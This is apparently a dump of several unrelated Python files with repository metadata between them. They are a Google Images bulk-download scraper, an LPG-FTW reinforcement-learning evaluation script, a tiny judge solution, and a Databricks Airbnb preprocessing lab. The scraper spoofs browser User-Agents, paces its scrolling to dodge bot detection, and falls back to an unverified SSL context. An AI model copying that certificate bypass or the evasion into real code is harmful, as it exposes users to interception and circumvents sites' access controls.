if cur_version >= version: # If the Current Version of Python is 3.0 or above
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers=headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: # If the Current Version of Python is 2.x
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers=headers)
try:
response = urllib2.urlopen(req)
except URLError: # Handling SSL certificate failed
context = ssl._create_unverified_context()
response = urlopen(req, context=context)
page = response.read()
return page
except:
return "Page Not found"
# Download Page for more than 100 images
def download_extended_page(url):
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
if sys.version_info[0] < 3:
reload(sys)
sys.setdefaultencoding('utf8')
options = webdriver.ChromeOptions()
options.add_argument('--no-sandbox')
options.add_argument("--headless")
try:
browser = webdriver.Chrome(arguments['chromedriver'], chrome_options=options)
except:
print("Looks like we cannot locate the path the 'chromedriver' (use the '--chromedriver' "
"argument to specify the path to the executable.) or google chrome browser is not "
"installed on your machine")
sys.exit()
browser.set_window_size(1024, 768)
# Open the link
browser.get(url)
time.sleep(1)
print("Getting you a lot of images. This may take a few moments...")
element = browser.find_element_by_tag_name("body")
# Scroll down
for i in range(30):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3)
try:
browser.find_element_by_id("smb").click()
for i in range(50):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3) # bot id protection
except:
for i in range(10):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3) # bot id protection
print("Reached end of Page.")
time.sleep(0.5)
source = browser.page_source #page source
#close the browser
browser.close()
return source
#Correcting the escape characters for python2
def replace_with_byte(match):
return chr(int(match.group(0)[1:], 8))
def repair(brokenjson):
invalid_escape = re.compile(r'\\[0-7]{1,3}') # up to 3 digits for byte values up to FF
return invalid_escape.sub(replace_with_byte, brokenjson)
# Finding 'Next Image' from the given raw page
def get_next_tab(s):
start_line = s.find('class="ZO5Spb"')
if start_line == -1: # If no links are found then give an error!
end_quote = 0
link = "no_tabs"
return link,'',end_quote
else:
start_line = s.find('class="ZO5Spb"')
start_content = s.find('href="', start_line + 1)
end_content = s.find('">', start_content + 1)
url_item = "https://www.google.com" + str(s[start_content+6:end_content])
url_item = url_item.replace('&', '&')
start_line_2 = s.find('class="ZO5Spb"')
start_content_2 = s.find(':', start_line_2 + 1)
end_content_2 = s.find('"', start_content_2 + 1)
url_item_name = str(s[start_content_2 + 1:end_content_2])
#print(url_item,url_item_name)
return url_item,url_item_name,end_content
# Getting all links with the help of '_images_get_next_image'
def get_all_tabs(page):
tabs = {}
while True:
item,item_name,end_content = get_next_tab(page)
if item == "no_tabs":
break
else:
tabs[item_name] = item # Append all the links in the list named 'Links'
time.sleep(0.1) # Timer could be used to slow down the request for image downloads
page = page[end_content:]
return tabs
#Format the object in readable format
def format_object(object):
formatted_object = {}
formatted_object['image_format'] = object['ity']
formatted_object['image_height'] = object['oh']
formatted_object['image_width'] = object['ow']
formatted_object['image_link'] = object['ou']
formatted_object['image_description'] = object['pt']
formatted_object['image_host'] = object['rh']
formatted_object['image_source'] = object['ru']
formatted_object['image_thumbnail_url'] = object['tu']
return formatted_object
#function to download single image
def single_image():
url = arguments['single_image']
try:
os.makedirs(main_directory)
except OSError as e:
if e.errno != 17:
raise
pass
req = Request(url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
response = urlopen(req, None, 10)
image_name = str(url[(url.rfind('/')) + 1:])
if '?' in image_name:
image_name = image_name[:image_name.find('?')]
if ".jpg" in image_name or ".gif" in image_name or ".png" in image_name or ".bmp" in image_name or ".svg" in image_name or ".webp" in image_name or ".ico" in image_name:
output_file = open(main_directory + "/" + image_name, 'wb')
else:
output_file = open(main_directory + "/" + image_name + ".jpg", 'wb')
image_name = image_name + ".jpg"
data = response.read()
output_file.write(data)
response.close()
print("completed ====> " + image_name)
return
def similar_images():
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
try:
searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + arguments['similar_images']
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req1 = urllib.request.Request(searchUrl, headers=headers)
resp1 = urllib.request.urlopen(req1)
content = str(resp1.read())
l1 = content.find('AMhZZ')
l2 = content.find('&', l1)
urll = content[l1:l2]
newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X"
req2 = urllib.request.Request(newurl, headers=headers)
resp2 = urllib.request.urlopen(req2)
# print(resp2.read())
l3 = content.find('/search?sa=X&q=')
l4 = content.find(';', l3 + 19)
urll2 = content[l3 + 19:l4]
return urll2
except:
return "Cloud not connect to Google Images endpoint"
else: # If the Current Version of Python is 2.x
try:
searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + arguments['similar_images']
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req1 = urllib2.Request(searchUrl, headers=headers)
resp1 = urllib2.urlopen(req1)
content = str(resp1.read())
l1 = content.find('AMhZZ')
l2 = content.find('&', l1)
urll = content[l1:l2]
newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X"
#print newurl
req2 = urllib2.Request(newurl, headers=headers)
resp2 = urllib2.urlopen(req2)
# print(resp2.read())
l3 = content.find('/search?sa=X&q=')
l4 = content.find(';', l3 + 19)
urll2 = content[l3 + 19:l4]
return(urll2)
except:
return "Cloud not connect to Google Images endpoint"
#Building URL parameters
def build_url_parameters():
if arguments['language']:
lang = "&lr="
lang_param = {"Arabic":"lang_ar","Chinese (Simplified)":"lang_zh-CN","Chinese (Traditional)":"lang_zh-TW","Czech":"lang_cs","Danish":"lang_da","Dutch":"lang_nl","English":"lang_en","Estonian":"lang_et","Finnish":"lang_fi","French":"lang_fr","German":"lang_de","Greek":"lang_el","Hebrew":"lang_iw ","Hungarian":"lang_hu","Icelandic":"lang_is","Italian":"lang_it","Japanese":"lang_ja","Korean":"lang_ko","Latvian":"lang_lv","Lithuanian":"lang_lt","Norwegian":"lang_no","Portuguese":"lang_pt","Polish":"lang_pl","Romanian":"lang_ro","Russian":"lang_ru","Spanish":"lang_es","Swedish":"lang_sv","Turkish":"lang_tr"}
lang_url = lang+lang_param[arguments['language']]
else:
lang_url = ''
if arguments['time_range']:
json_acceptable_string = arguments['time_range'].replace("'", "\"")
d = json.loads(json_acceptable_string)
time_range = '&cdr:1,cd_min:' + d['time_min'] + ',cd_max:' + d['time_min']
else:
time_range = ''
built_url = "&tbs="
counter = 0
params = {'color':[arguments['color'],{'red':'ic:specific,isc:red', 'orange':'ic:specific,isc:orange', 'yellow':'ic:specific,isc:yellow', 'green':'ic:specific,isc:green', 'teal':'ic:specific,isc:teel', 'blue':'ic:specific,isc:blue', 'purple':'ic:specific,isc:purple', 'pink':'ic:specific,isc:pink', 'white':'ic:specific,isc:white', 'gray':'ic:specific,isc:gray', 'black':'ic:specific,isc:black', 'brown':'ic:specific,isc:brown'}],
'color_type':[arguments['color_type'],{'full-color':'ic:color', 'black-and-white':'ic:gray','transparent':'ic:trans'}],
'usage_rights':[arguments['usage_rights'],{'labeled-for-reuse-with-modifications':'sur:fmc','labeled-for-reuse':'sur:fc','labeled-for-noncommercial-reuse-with-modification':'sur:fm','labeled-for-nocommercial-reuse':'sur:f'}],
'size':[arguments['size'],{'large':'isz:l','medium':'isz:m','icon':'isz:i','>400*300':'isz:lt,islt:qsvga','>640*480':'isz:lt,islt:vga','>800*600':'isz:lt,islt:svga','>1024*768':'visz:lt,islt:xga','>2MP':'isz:lt,islt:2mp','>4MP':'isz:lt,islt:4mp','>6MP':'isz:lt,islt:6mp','>8MP':'isz:lt,islt:8mp','>10MP':'isz:lt,islt:10mp','>12MP':'isz:lt,islt:12mp','>15MP':'isz:lt,islt:15mp','>20MP':'isz:lt,islt:20mp','>40MP':'isz:lt,islt:40mp','>70MP':'isz:lt,islt:70mp'}],
'type':[arguments['type'],{'face':'itp:face','photo':'itp:photo','clip-art':'itp:clip-art','line-drawing':'itp:lineart','animated':'itp:animated'}],
'time':[arguments['time'],{'past-24-hours':'qdr:d','past-7-days':'qdr:w'}],
'aspect_ratio':[arguments['aspect_ratio'],{'tall':'iar:t','square':'iar:s','wide':'iar:w','panoramic':'iar:xw'}],
'format':[arguments['format'],{'jpg':'ift:jpg','gif':'ift:gif','png':'ift:png','bmp':'ift:bmp','svg':'ift:svg','webp':'webp','ico':'ift:ico'}]}
for key, value in params.items():
if value[0] is not None:
ext_param = value[1][value[0]]
# counter will tell if it is first param added or not
if counter == 0:
# add it to the built url
built_url = built_url + ext_param
counter += 1
else:
built_url = built_url + ',' + ext_param
counter += 1
built_url = lang_url+built_url+time_range
return built_url
#building main search URL
def build_search_url(search_term,params):
# check the args and choose the URL
if arguments['url']:
url = arguments['url']
elif arguments['similar_images']:
keywordem = similar_images()
url = 'https://www.google.com/search?q=' + keywordem + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
elif arguments['specific_site']:
url = 'https://www.google.com/search?q=' + quote(
search_term) + '&as_sitesearch=' + arguments['specific_site'] + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
else:
url = 'https://www.google.com/search?q=' + quote(
search_term) + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
#print(url)
return url
#measures the file size
def file_size(file_path):
if os.path.isfile(file_path):
file_info = os.stat(file_path)
size = file_info.st_size
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if size < 1024.0:
return "%3.1f %s" % (size, x)
size /= 1024.0
return size
# make directories
def create_directories(main_directory, dir_name):
dir_name_thumbnail = dir_name + " - thumbnail"
# make a search keyword directory
try:
if not os.path.exists(main_directory):
os.makedirs(main_directory)
time.sleep(0.2)
path = str(dir_name)
sub_directory = os.path.join(main_directory, path)
if not os.path.exists(sub_directory):
os.makedirs(sub_directory)
if arguments['thumbnail']:
sub_directory_thumbnail = os.path.join(main_directory, dir_name_thumbnail)
if not os.path.exists(sub_directory_thumbnail):
os.makedirs(sub_directory_thumbnail)
else:
path = str(dir_name)
sub_directory = os.path.join(main_directory, path)
if not os.path.exists(sub_directory):
os.makedirs(sub_directory)
if arguments['thumbnail']:
sub_directory_thumbnail = os.path.join(main_directory, dir_name_thumbnail)
if not os.path.exists(sub_directory_thumbnail):
os.makedirs(sub_directory_thumbnail)
except OSError as e:
if e.errno != 17:
raise
# time.sleep might help here
pass
return
# Download Images
def download_image_thumbnail(image_url,main_directory,dir_name,return_image_name):
if arguments['print_urls']:
print("Image URL: " + image_url)
try:
req = Request(image_url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
try:
# timeout time to download an image
if arguments['socket_timeout']:
timeout = float(arguments['socket_timeout'])
else:
timeout = 10
response = urlopen(req, None, timeout)
path = main_directory + "/" + dir_name + " - thumbnail" + "/" + return_image_name
output_file = open(path, 'wb')
data = response.read()
output_file.write(data)
response.close()
download_status = 'success'
download_message = "Completed Image Thumbnail ====> " + return_image_name
# image size parameter
if arguments['print_size']:
print("Image Size: " + str(file_size(path)))
except UnicodeEncodeError as e:
download_status = 'fail'
download_message = "UnicodeEncodeError on an image...trying next one..." + " Error: " + str(e)
except HTTPError as e: # If there is any HTTPError
download_status = 'fail'
download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e)
except URLError as e:
download_status = 'fail'
download_message = "URLError on an image...trying next one..." + " Error: " + str(e)
except ssl.CertificateError as e:
download_status = 'fail'
download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e)
except IOError as e: # If there is any IOError
download_status = 'fail'
download_message = "IOError on an image...trying next one..." + " Error: " + str(e)
return download_status, download_message
# Download Images
def download_image(image_url,image_format,main_directory,dir_name,count):
if arguments['print_urls']:
print("Image URL: " + image_url)
try:
req = Request(image_url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
try:
# timeout time to download an image
if arguments['socket_timeout']:
timeout = float(arguments['socket_timeout'])
else:
timeout = 10
response = urlopen(req, None, timeout)
# keep everything after the last '/'
image_name = str(image_url[(image_url.rfind('/')) + 1:])
image_name = image_name.lower()
# if no extension then add it
# remove everything after the image name
if image_format == "":
image_name = image_name + "." + "jpg"
elif image_format == "jpeg":
image_name = image_name[:image_name.find(image_format) + 4]
else:
image_name = image_name[:image_name.find(image_format) + 3]
# prefix name in image
if arguments['prefix']:
prefix = arguments['prefix'] + " "
else:
prefix = ''
path = main_directory + "/" + dir_name + "/" + prefix + str(count) + ". " + image_name
output_file = open(path, 'wb')
data = response.read()
output_file.write(data)
response.close()
#return image name back to calling method to use it for thumbnail downloads
return_image_name = prefix + str(count) + ". " + image_name
download_status = 'success'
download_message = "Completed Image ====> " + prefix + str(count) + ". " + image_name
# image size parameter
if arguments['print_size']:
print("Image Size: " + str(file_size(path)))
except UnicodeEncodeError as e:
download_status = 'fail'
download_message = "UnicodeEncodeError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
except HTTPError as e: # If there is any HTTPError
download_status = 'fail'
download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
except URLError as e:
download_status = 'fail'
download_message = "URLError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
except ssl.CertificateError as e:
download_status = 'fail'
download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
except IOError as e: # If there is any IOError
download_status = 'fail'
download_message = "IOError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
return download_status,download_message,return_image_name
# Finding 'Next Image' from the given raw page
def _get_next_item(s):
start_line = s.find('rg_meta notranslate')
if start_line == -1: # If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('class="rg_meta notranslate">')
start_object = s.find('{', start_line + 1)
end_object = s.find('</div>', start_object + 1)
object_raw = str(s[start_object:end_object])
#remove escape characters based on python version
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: #python3
try:
object_decode = bytes(object_raw, "utf-8").decode("unicode_escape")
final_object = json.loads(object_decode)
except:
final_object = ""
else: #python2
try:
final_object = (json.loads(repair(object_raw)))
except:
final_object = ""
return final_object, end_object
# Getting all links with the help of '_images_get_next_image'
def _get_all_items(page,main_directory,dir_name,limit):
items = []
errorCount = 0
i = 0
count = 1
while count < limit+1:
object, end_content = _get_next_item(page)
if object == "no_links":
break
elif object == "":
page = page[end_content:]
else:
#format the item for readability
object = format_object(object)
if arguments['metadata']:
print("\nImage Metadata" + str(object))
items.append(object) # Append all the links in the list named 'Links'
#download the images
download_status,download_message,return_image_name = download_image(object['image_link'],object['image_format'],main_directory,dir_name,count)
print(download_message)
if download_status == "success":
# download image_thumbnails
if arguments['thumbnail']:
download_status, download_message_thumbnail = download_image_thumbnail(object['image_thumbnail_url'],main_directory,dir_name,return_image_name)
print(download_message_thumbnail)
count += 1
else:
errorCount += 1
#delay param
if arguments['delay']:
time.sleep(int(arguments['delay']))
page = page[end_content:]
i += 1
if count < limit:
print("\n\nUnfortunately all " + str(
limit) + " could not be downloaded because some images were not downloadable. " + str(
count-1) + " is all we got for this search filter!")
return items,errorCount
# Bulk Download
def bulk_download(search_keyword,suffix_keywords,prefix_keywords,limit,main_directory):
# appending a dummy value to Suffix Keywords array if it is blank
if len(suffix_keywords) == 0:
suffix_keywords.append('')
if len(prefix_keywords) == 0:
prefix_keywords.append('')
for pky in prefix_keywords:
for sky in suffix_keywords: # 1.for every suffix keywords
i = 0
while i < len(search_keyword): # 2.for every main keyword
iteration = "\n" + "Item no.: " + str(i + 1) + " -->" + " Item name = " + str(pky) + str(search_keyword[i] + str(sky))
print(iteration)
print("Evaluating...")
search_term = pky + search_keyword[i] + sky
dir_name = search_term + ('-' + arguments['color'] if arguments['color'] else '') #sub-directory
create_directories(main_directory,dir_name) #create directories in OS
params = build_url_parameters() #building URL with params
url = build_search_url(search_term,params) #building main search url
if limit < 101:
raw_html = download_page(url) # download page
else:
raw_html = download_extended_page(url)
print("Starting Download...")
items,errorCount = _get_all_items(raw_html,main_directory,dir_name,limit) #get all image items and download images
#dumps into a text file
if arguments['extract_metadata']:
try:
if not os.path.exists("logs"):
os.makedirs("logs")
except OSError as e:
print(e)
text_file = open("logs/"+search_keyword[i]+".txt", "w")
text_file.write(json.dumps(items, indent=4, sort_keys=True))
text_file.close()
#Related images
if arguments['related_images']:
print("\nGetting list of related keywords...this may take a few moments")
tabs = get_all_tabs(raw_html)
for key, value in tabs.items():
final_search_term = (search_term + " - " + key)
print("\nNow Downloading - " + final_search_term)
if limit < 101:
new_raw_html = download_page(value) # download page
else:
new_raw_html = download_extended_page(value)
create_directories(main_directory, final_search_term)
_get_all_items(new_raw_html, main_directory, search_term + " - " + key, limit)
i += 1
return errorCount
#------------- Main Program -------------#
for arguments in records:
#Initialization and Validation of user arguments
if arguments['keywords']:
search_keyword = [str(item) for item in arguments['keywords'].split(',')]
#Initialization and Validation of user arguments
if arguments['keywords_from_file']:
search_keyword = []
file_name = arguments['keywords_from_file']
with codecs.open(file_name, 'r', encoding='utf-8-sig') as f:
if '.csv' in file_name:
for line in f:
if line in ['\n', '\r\n']:
pass
else:
search_keyword.append(line.replace('\n', '').replace('\r', ''))
# print(line)
#print(search_keyword)
elif '.txt' in file_name:
for line in f:
if line in ['\n', '\r\n']:
pass
else:
# print line
search_keyword.append(line.replace('\n', '').replace('\r', ''))
#print(search_keyword)
else:
print("Invalid file type: Valid file types are either .txt or .csv \n"
"exiting...")
sys.exit()
# both time and time range should not be allowed in the same query
if arguments['time'] and arguments['time_range']:
parser.error('Either time or time range should be used in a query. Both cannot be used at the same time.')
#Additional words added to keywords
if arguments['suffix_keywords']:
suffix_keywords = [" " + str(sk) for sk in arguments['suffix_keywords'].split(',')]
else:
suffix_keywords = []
# Additional words added to keywords
if arguments['prefix_keywords']:
prefix_keywords = [str(sk) + " " for sk in arguments['prefix_keywords'].split(',')]
else:
prefix_keywords = []
# Setting limit on number of images to be downloaded
if arguments['limit']:
limit = int(arguments['limit'])
else:
limit = 100
if arguments['url']:
current_time = str(datetime.datetime.now()).split('.')[0]
search_keyword = [current_time.replace(":", "_")]
if arguments['similar_images']:
current_time = str(datetime.datetime.now()).split('.')[0]
search_keyword = [current_time.replace(":", "_")]
# If single_image or url argument not present then keywords is mandatory argument
if arguments['single_image'] is None and arguments['url'] is None and arguments['similar_images'] is None and arguments['keywords'] is None and arguments['keywords_from_file'] is None:
parser.error('Keywords is a required argument!')
# If this argument is present, set the custom output directory
if arguments['output_directory']:
main_directory = arguments['output_directory']
else:
main_directory = "downloads"
# Set the delay parameter if this argument is present
if arguments['delay']:
try:
delay_time = int(arguments['delay'])
except ValueError:
parser.error('Delay parameter should be an integer!')
else:
delay_time = 0
if arguments['print_urls']:
print_url = 'yes'
else:
print_url = 'no'
if arguments['print_size']:
print_size = 'yes'
else:
print_size = 'no'
if arguments['proxy']:
os.environ["http_proxy"] = arguments['proxy']
os.environ["https_proxy"] = arguments['proxy']
#Initialization Complete
if arguments['single_image']: #Download Single Image using a URL
single_image()
else: # or download multiple images based on keywords/keyphrase search
t0 = time.time() # start the timer
errorCount = bulk_download(search_keyword,suffix_keywords,prefix_keywords,limit,main_directory)
print("\nEverything downloaded!")
print("Total Errors: " + str(errorCount) + "\n")
t1 = time.time() # stop the timer
total_time = t1 - t0 # Calculating the total time required to crawl, find and download all the links of 60,000 images
print("Total time taken: " + str(total_time) + " Seconds")
#--------End of the main program --------#
# In[ ]:
| 46.913376 | 618 | 0.609933 |
3fc9b898972a10ccf2545d6d079a01b7b53465d3 | 2,971 | py | Python | experiments/mtl_bodypart_tasks/start/half_cheetah_pgftw.py | optimass/LPG-FTW | fd79b96b67e32735916413e822938188b0bb7948 | [
"Apache-2.0"
] | 8 | 2021-03-21T18:01:28.000Z | 2022-02-20T13:58:16.000Z | experiments/mtl_bodypart_tasks/start/half_cheetah_pgftw.py | optimass/LPG-FTW | fd79b96b67e32735916413e822938188b0bb7948 | [
"Apache-2.0"
] | 1 | 2021-09-22T13:44:40.000Z | 2021-09-22T13:44:40.000Z | experiments/mtl_bodypart_tasks/start/half_cheetah_pgftw.py | optimass/LPG-FTW | fd79b96b67e32735916413e822938188b0bb7948 | [
"Apache-2.0"
] | 2 | 2021-05-18T22:08:44.000Z | 2021-08-16T19:38:11.000Z | '''
Measure performance after updating L at the end
of training each task
'''
from mjrl.utils.gym_env import GymEnv
from mjrl.policies.gaussian_linear_lpg_ftw import LinearPolicyLPGFTW
from mjrl.algos.npg_cg_ftw import NPGFTW
import numpy as np
import gym
import pickle
import torch
import os
SEED = 50 # initial value, 10 will be added for every iteration
job_name_mtl = 'results/halfcheetah_mtl_bodyparts_exp'
job_name_lpgftw = 'results/halfcheetah_lpgftw_bodyparts_exp'
# MTL policy
# ==================================
num_tasks = 20
num_seeds = 5
num_cpu = 5
f = open(job_name_mtl+'/env_factors.pickle', 'rb')
size_factors_list = pickle.load(f)
f.close()
f = open(job_name_mtl+'/env_ids.pickle','rb')
env_ids = pickle.load(f)
f.close()
e_unshuffled = {}
for task_id in range(num_tasks):
size_factors = size_factors_list[task_id]
env_id = env_ids[task_id]
gym.envs.register(
id=env_id,
entry_point='gym_extensions.continuous.mujoco.modified_half_cheetah:HalfCheetahModifiedBodyPartSizeEnv',
max_episode_steps=1000,
reward_threshold=3800.0,
kwargs=dict(body_parts=['torso','fthigh','fshin','ffoot'], size_scales=size_factors)
)
e_unshuffled[task_id] = GymEnv(env_id) # only do the environment here, so different files can create the same tasks
for i in range(num_seeds):
np.random.seed(SEED)
torch.manual_seed(SEED)
job_name_lpgftw_seed = job_name_lpgftw + '/seed_{}'.format(i)
f = open(job_name_lpgftw_seed+'/task_order.pickle', 'rb')
task_order = pickle.load(f)
f.close()
e = {}
for task_id in range(num_tasks):
e[task_id] = e_unshuffled[task_order[task_id]]
baseline_mtl = {}
forward_transfer_results = {}
for t in range(num_tasks):
job_name_lpgftw_seed = job_name_lpgftw + '/seed_{}'.format(i)
f = open(job_name_lpgftw_seed + '/iterations/task_{}/'.format(t) + 'policy_0.pickle', 'rb')
policy_mtl = pickle.load(f)
f.close()
f = open(job_name_lpgftw_seed + '/iterations/task_{}/'.format(t) + 'baseline_0.pickle', 'rb')
baseline_mtl[t] = pickle.load(f)
f.close()
if isinstance(policy_mtl.model.theta, list):
policy_mtl.model.theta = torch.autograd.Variable(torch.zeros(0))
agent_mtl = NPGFTW(e, policy_mtl, baseline_mtl, normalized_step_size=0.1, seed=SEED, save_logs=False, new_col_mode='performance')
mean_test_perf = agent_mtl.test_tasks(test_rollouts=10,
num_cpu=num_cpu,
task_ids=np.array([t]))
forward_transfer_results = {**forward_transfer_results, **mean_test_perf}
result_file = open(job_name_lpgftw_seed + '/start_results.txt', 'w')
result_file.write(str(forward_transfer_results))
result_file.close()
SEED += 10
| 33.382022 | 141 | 0.653989 |
27857da825a18fa2797511cd7c3220edb153aa8c | 41 | py | Python | problem/01000~09999/03046/3046.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-19T16:37:44.000Z | 2019-04-19T16:37:44.000Z | problem/01000~09999/03046/3046.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-20T11:42:44.000Z | 2019-04-20T11:42:44.000Z | problem/01000~09999/03046/3046.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 3 | 2019-04-19T16:37:47.000Z | 2021-10-25T00:45:00.000Z | a,b=map(int,input().split())
print(2*b-a) | 20.5 | 28 | 0.634146 |
d7d6fe6af5689b98a626240d46c9e88f878d1bca | 15,056 | py | Python | project3-mlops/Labs/05-Lab.py | Shemkent/dscc202-402-spring2022 | 446c0709f2c298169223abfb5c8e7f4374d53484 | [
"MIT"
] | null | null | null | project3-mlops/Labs/05-Lab.py | Shemkent/dscc202-402-spring2022 | 446c0709f2c298169223abfb5c8e7f4374d53484 | [
"MIT"
] | null | null | null | project3-mlops/Labs/05-Lab.py | Shemkent/dscc202-402-spring2022 | 446c0709f2c298169223abfb5c8e7f4374d53484 | [
"MIT"
] | null | null | null | # Databricks notebook source
# MAGIC %md
# MAGIC # Lab: Adding Pre and Post-Processing Logic
# MAGIC
# MAGIC ##  In this lab you:<br>
# MAGIC - Import data and train a random forest model
# MAGIC - Defining pre-processing steps
# MAGIC - Adding post-processing steps
# MAGIC
# MAGIC ## Prerequisites
# MAGIC - Web browser: Chrome
# MAGIC - A cluster configured with **8 cores** and **DBR 7.0 ML**
# COMMAND ----------
# MAGIC %md
# MAGIC ##  Classroom-Setup
# MAGIC
# MAGIC For each lesson to execute correctly, please make sure to run the **`Classroom-Setup`** cell at the<br/>
# MAGIC start of each lesson (see the next cell) and the **`Classroom-Cleanup`** cell at the end of each lesson.
# COMMAND ----------
# MAGIC %run "../Includes/Classroom-Setup"
# COMMAND ----------
# MAGIC %md
# MAGIC ## Import Data and Train Random Forest
# COMMAND ----------
# MAGIC %md
# MAGIC Import the Airbnb DataFrame.
# COMMAND ----------
import pandas as pd
from sklearn.model_selection import train_test_split
df = pd.read_csv("/dbfs/mnt/training/airbnb/sf-listings/airbnb-cleaned-mlflow.csv")
X_train, X_test, y_train, y_test = train_test_split(df.drop(["price"], axis=1), df[["price"]].values.ravel(), random_state=42)
# COMMAND ----------
# MAGIC %md
# MAGIC Train a random forest model.
# COMMAND ----------
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score
rf = RandomForestRegressor(n_estimators=100, max_depth=25)
rf.fit(X_train, y_train)
rf_mse = mean_squared_error(y_test, rf.predict(X_test))
rf_mse
# COMMAND ----------
# MAGIC %md
# MAGIC ## Pre-processing Our Data
# MAGIC
# MAGIC We would like to add some pre-processing steps to our data before training a RF model in order to decrease the MSE and improve our model's performance.
# MAGIC
# MAGIC Take a look at the first 10 rows of our data.
# COMMAND ----------
df.iloc[:10]
# COMMAND ----------
# MAGIC %md-sandbox
# MAGIC Notice that all the values in the `latitude` and `longitude` columns are very similar (up to tenth place) since all the Airbnb listings are in San Francisco. The Airbnb pricing probably will not vary too much between longitude and latitude differences of 0.0001 so we can facilitate the splitting factors of our tree by rounding the `latitude` and `longitude` values to the nearest hundredth instead of worrying about all 6 digits after the decimal point. We will create these values in new columns called `trunc_lat` and `trunc_long` and drop the original `latitude` and `longitude` columns.
# MAGIC
# MAGIC Additionally, notice that the 'review_scores_accuracy',
# MAGIC 'review_scores_cleanliness', 'review_scores_checkin',
# MAGIC 'review_scores_communication', 'review_scores_location', and
# MAGIC 'review_scores_value'
# MAGIC encode pretty similar information so we will go ahead and summarize them into single column called `summed_review_scores` which contains the summation of the above 6 columns. Hopefully the tree will be able to make a more informed split given this additional information.
# MAGIC
# MAGIC
# MAGIC Fill in the pre-processing lines to create the `X_test_processed` and `X_train_processed` DataFrames. Then we will train a new random forest model off this pre-processed data.
# MAGIC
# MAGIC <img alt="Hint" title="Hint" style="vertical-align: text-bottom; position: relative; height:1.75em; top:0.3em" src="https://files.training.databricks.com/static/images/icon-light-bulb.svg"/> **Hint:** Take a look at python's built in `round` function.
# COMMAND ----------
# TODO
# new random forest model
rf2 = RandomForestRegressor(n_estimators=100, max_depth=25)
# pre-process train data
X_train_processed = X_train.copy()
X_train_processed["trunc_lat"] = X_train_processed["latitude"].apply(lambda x: round(x,2))
X_train_processed["trunc_long"] = X_train_processed["longitude"].apply(lambda x: round(x,2))
col_names = ['review_scores_accuracy', 'review_scores_cleanliness', 'review_scores_checkin', 'review_scores_communication', 'review_scores_location', 'review_scores_value']
X_train_processed["review_scores_sum"] = X_train_processed[col_names].sum(axis=1)
col_names.append('latitude')
col_names.append('longitude')
X_train_processed = X_train_processed.drop(columns=col_names) #, axis=1)
# pre-process test data to obtain MSE
X_test_processed = X_test.copy()
X_test_processed["trunc_lat"] = X_test_processed["latitude"].apply(lambda x: round(x,2))
X_test_processed["trunc_long"] = X_test_processed["longitude"].apply(lambda x: round(x,2))
col_names = ['review_scores_accuracy', 'review_scores_cleanliness', 'review_scores_checkin', 'review_scores_communication', 'review_scores_location', 'review_scores_value']
X_test_processed["review_scores_sum"] = X_test_processed[col_names].sum(axis=1)
col_names.append('latitude')
col_names.append('longitude')
X_test_processed = X_test_processed.drop(columns=col_names) #, axis=1)
# fit and evaluate new rf model
rf2.fit(X_train_processed, y_train)
rf2_mse = mean_squared_error(y_test, rf2.predict(X_test_processed))
rf2_mse
# COMMAND ----------
# MAGIC %md
# MAGIC After training our new `rf2` model, let us log this run in MLflow so we can use this trained model in the future by loading it.
# COMMAND ----------
